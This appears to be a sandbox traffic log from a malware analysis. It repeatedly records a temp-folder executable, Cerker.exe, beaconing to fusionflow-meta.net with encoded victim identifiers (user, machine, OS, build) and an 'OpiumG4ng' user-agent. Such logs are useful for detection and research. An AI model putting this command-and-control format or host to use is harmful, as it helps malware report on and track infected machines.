2024-08-31 20:44:55 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:56 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f06cwY5%2BktflpJWEzc2ZavjF7FWrC2lEJvIkHNFBCoZcfpg2vRuY1%2FA7or44C4rgqo1aEqv7hLJxoDh7icS7VGeNNywsBsTkBnDkAWfnzPQkyS6PLdZ%2FHS9OXAevuHNXiBLUDOfP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc7f1e0843f7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:56 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50077	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:56 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:57 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8MwdaCMEG3hFA1puE3T679Ai3Pl0Ff2NO0H48Gsd0V8ijffbS8lvhFkPENlnBgGMemL2FXXgx6F70u8t6A3Zuln%2FBDJLQ7wEHlg2YGWO%2BRr8RIekbj5dVpzGkFTdLVNxP9L2c3sq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc87ef3742e8-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:57 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50080	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:57 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:58 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pitsVuiN7Q7eQaLlsF9BZ7i560LuAzQtXyC5GzOzgdrYNwSKIv%2BFfVybxFyvktsFTuQhtCos4Ma1xVzjQvU1X37aSK8g7Vk%2Fe%2F%2F%2BYxP7btRbi6PFlz2y6xbynFM2JJFOW2qfz0m1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc8e9bc70cf1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:58 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50082	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:59 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:00 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zN4yFgDOe1MrdbO8RfEQGTAxKRoy8Rp%2BwUP%2FwDg9gaaBf4p421BL0rZZ7ctRXx6xxqlUvdPi97IqyCVnA%2BF24VdQexpIr%2Fq7lZAPNdtkuEm2YKeTspfDhgvYqVgnX1riXLP5%2BOz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc991fed42df-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:00 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50085	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:01 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:02 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9AQePyxW878kt15Y8kX9wyP44S7tQzP4ihFDO8%2FrCg68IEn%2BKkWkHqWD41eUzn7NYd15JaaczoM9XEvfbiGkT0vwXy%2F5GwMeFxVHbfo0yVCovJ2g9uAguR77uKEcSE4BNbKUHnEx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdca25c7717f9-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:02 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50088	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:03 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:03 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouOARRY4NrBG7e4bxHSQQWlpX8git3iDFeEG%2FPWI0eUyUyKJuununseOvas86YzBir6ucaZPrRI2ONY4IO2avUd00wGwLg0%2BmZY4uI4Lq0prdovzZstnW%2B4wHoYgzQ9aF3XDDv3Q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcae4abf0fa1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:03 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50091	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:04 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:04 UTC	696	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZZjnYo9fOhpWVdMIYMWROb7UTVkI2871mBC4%2B%2BWwvij%2BpaHrn%2Ff9sS25uHe9a7gTJmQRV%2Fgp40nwKQiXPO7u8d0aYCPs04u1%2FdbDjyxWRAIB21nuJG%2FoZiCGMG%2BJHxE7LXFNTbhe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcb5fef88c33-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:04 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50094	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:05 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:06 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4HTPjWhENRb9iLjpLXJHPxhGakogbzDzYPmNdHiQkNIBMI4VOKuY9RX9BIXXyCn%2F5SRHVZRSdspT5AS9JDDqh6OWi%2BojX4EQ2OHFDEQy6lDPkuBTrcMz9DNKSz%2FTNGILyNOdf4SY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcbd9c725e78-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:06 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50096	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:06 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:07 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QEtTCQrdvtGOibW9pKHk5mPHN8uLi%2BkpL%2FNWS0KQ0NFLumMHwdsC4h%2BOLZzRMIaXSsjQgbaBrzSoOjoV%2BD0qSI45lycNezNC2iuk3ftHm04LdtPIIUpVQf4hzvRM7kj7uIhz7plH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcc54dad7ce4-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:07 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50098	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:07 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:08 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nGYtkRFkImBwysRfhRFexCk6d78z16BX%2BR8SQBf7RlelrjZjpAwRODI2cEgzOHwC%2BQSxOxxKB%2FBlKXy44oa3x%2FfPEXaGJFTC90dMVDl7hwm5%2BqUK2S2pksDovDvnspAyfuwt6wlz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdccce9580f41-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:08 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50100	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:09 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:10 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPjX0x0btSlR%2F0l91y275hiJi%2FbC5nEi3l7QoPkOSSVQtm%2FPa5p3HfAYqMN4FZTjdPZerZOnYZwvMcMMXQv%2BfoRHQorhNyYxzDtmSoiKQZh0QOY9EcYXXNCge5cCzODeRRY0KUbm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcd46bbf7cf0-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:10 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50103	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:11 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:11 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdYe4%2BRLq0pkrLk9Xt5HkH3yEr2PhcVvIb5ULJJpD7tEYzr4ojE6nM%2BZOpRsaX8HEOtof2srGqajngdl5XJsRFT6OjwIdR0KVEBoINfSVggbs2WNVnHprUHtLEbqvTP4b7VypuYo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdce26cb642c2-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:11 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50106	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:13 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:14 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ldAnNsQq%2Bbhztu%2BrCDX6QlAG4qAgXe3tl9wfLXD%2BEszproTbXNKrsneAWwzKEHrnm9iV%2B6VbndVP9znsjsXWsfcDfjD9tPMCG7TFM81shuHKXMhFiIkdg31BEr8n%2FzFVI%2BrRpeT6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcefce288c3c-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:14 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50108	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:14 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:15 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nG8piWB1KnFEGTm0JB49UKBarZ7DAqCxEpdlUCbyCi1M%2BuPT3J6O5cYSdsuqyVaHBRKyOs8%2BXFpYDGkc%2Flbu%2BxXUGEl8BOkVsluZGXjkaYkMsWONwKEUfaIjq5naf5by4HTXqnIi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcf7099a190a-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:15 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50111	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:16 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:16 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4FnP1muwBey2j1yJLMm5qGkRrq2TEQytSVleCiN%2B%2Bcm%2Fwgq3hhjH6WImuAh2Yux79mRET8pchMtAfTJo%2F5PFJCIFthNYMaI%2Fa9m6azXz3AJtWOhj4JG1ZSLq%2BKPUHwdcVTB9dZM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdcffdeff0f47-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:16 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50113	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:17 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:18 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzG6%2BRGVYJ6O4H7tkbDf1PpLklSshTLeukEEgyvu%2B%2BL9HHiIoNgAFpgwa%2F2ZLriQz6cxaJm24gutwKCsePU5gMUexs1L72oqkSZxsUa2KOAGlk%2FX8Yxd1EQ29O%2BJBEr7EFmrNhV%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd075bf3c427-EWR alt-svc: h3=":443"; ma=86400
